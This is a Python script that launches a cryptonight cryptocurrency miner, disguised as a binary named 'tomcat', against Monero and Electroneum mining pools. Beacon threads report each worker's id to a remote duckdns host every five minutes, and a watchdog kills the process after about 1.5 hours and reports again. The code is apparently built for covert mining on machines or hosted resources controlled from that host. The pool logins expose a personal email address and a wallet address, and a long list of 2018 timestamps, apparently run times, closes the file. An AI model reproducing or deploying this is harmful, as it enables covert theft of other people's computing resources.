import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:34:01.630948
#2018-02-17 17:22:01.520180
#2018-02-17 19:11:07.166095
#2018-02-17 20:59:04.879109
#2018-02-17 22:45:08.379450
#2018-02-18 00:27:04.815020
#2018-02-18 02:18:01.624479
#2018-02-18 04:05:07.519370
#2018-02-18 05:56:05.939162
#2018-02-18 07:46:07.187103
#2018-02-18 09:34:04.028119
#2018-02-18 11:20:01.972599
#2018-02-18 13:06:06.804908
#2018-02-18 14:55:05.188212
#2018-02-18 16:43:06.984035
#2018-02-18 18:31:06.023879
#2018-02-18 20:19:01.389210
#2018-02-18 22:03:06.799776
#2018-02-18 23:52:05.323564
#2018-02-19 01:38:06.542312
#2018-02-19 03:26:06.304494
#2018-02-19 05:11:07.415528
#2018-02-19 06:58:06.915749
#2018-02-19 08:46:07.418913
#2018-02-19 10:37:08.591573
#2018-02-19 12:24:06.227866
#2018-02-19 14:10:09.927821
#2018-02-19 15:58:04.265989
#2018-02-19 17:48:04.174081
#2018-02-19 19:34:08.460307
#2018-02-19 21:21:02.208251
#2018-02-19 23:06:07.335896
#2018-02-20 00:52:05.299774
#2018-02-20 02:41:03.772363
#2018-02-20 04:30:01.684275
#2018-02-20 06:14:01.448220
#2018-02-20 07:59:01.970467
#2018-02-20 09:44:08.303387
#2018-02-20 11:28:08.068232
#2018-02-20 13:15:10.022386
#2018-02-20 15:02:04.759988
#2018-02-20 16:46:08.981563
#2018-02-20 18:36:09.710901
#2018-02-20 20:26:09.351916
#2018-02-20 22:12:06.918038
#2018-02-20 23:54:07.785604
#2018-02-21 01:40:05.703110
#2018-02-21 03:28:06.012264
#2018-02-21 05:16:03.827564
#2018-02-21 07:03:04.750442
#2018-02-21 08:48:04.776122
#2018-02-21 10:34:06.054450
#2018-02-21 12:23:04.991729
#2018-02-21 14:09:08.689590
#2018-02-21 16:02:05.146409
#2018-02-21 17:54:02.201161
#2018-02-21 19:39:06.574578
#2018-02-21 21:26:01.650594
#2018-02-21 23:12:08.170822
#2018-02-22 01:02:06.645351
#2018-02-22 02:48:08.195100
#2018-02-22 04:34:07.075401
#2018-02-22 06:19:07.192846
#2018-02-22 08:06:07.261543
#2018-02-22 09:53:05.870126
#2018-02-22 11:37:04.355266
#2018-02-22 13:24:08.572306
#2018-02-22 15:14:06.306618
#2018-02-22 16:57:13.446382
#2018-02-22 18:45:11.717238
#2018-02-22 20:38:06.504243
#2018-02-22 22:23:02.063872
#2018-02-23 00:09:07.630615
#2018-02-23 01:59:07.311519
#2018-02-23 03:47:02.138816
#2018-02-23 05:38:03.982596
#2018-02-23 07:23:01.629033
#2018-02-23 09:27:06.974692
#2018-02-23 11:33:05.541263
#2018-02-23 13:24:04.254388
#2018-02-23 15:10:08.507096
#2018-02-23 16:58:09.128522
#2018-02-23 19:03:07.371950
#2018-02-23 20:48:01.408570
#2018-02-23 22:36:01.316062
#2018-02-24 00:22:06.835481
#2018-02-24 02:14:06.579930
#2018-02-24 04:04:07.016277
#2018-02-24 05:52:04.324750
#2018-02-24 07:41:04.179490
#2018-02-24 09:26:05.341449
#2018-02-24 11:19:07.363630
#2018-02-24 13:08:05.633943
#2018-02-24 14:58:01.925148
#2018-02-24 16:47:01.316246
#2018-02-24 18:34:07.396795
#2018-02-24 20:21:03.607423
#2018-02-24 22:16:06.297548
#2018-02-25 01:24:07.480716
#2018-02-25 05:07:05.995564
#2018-02-25 10:19:01.919837